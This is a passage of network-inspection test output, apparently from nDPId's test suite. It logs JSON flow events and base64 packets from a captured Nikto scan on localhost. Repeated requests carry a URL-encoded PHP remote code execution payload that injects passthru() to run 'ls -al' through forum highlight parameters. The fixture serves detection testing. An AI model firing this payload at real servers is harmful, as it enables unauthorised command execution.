+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 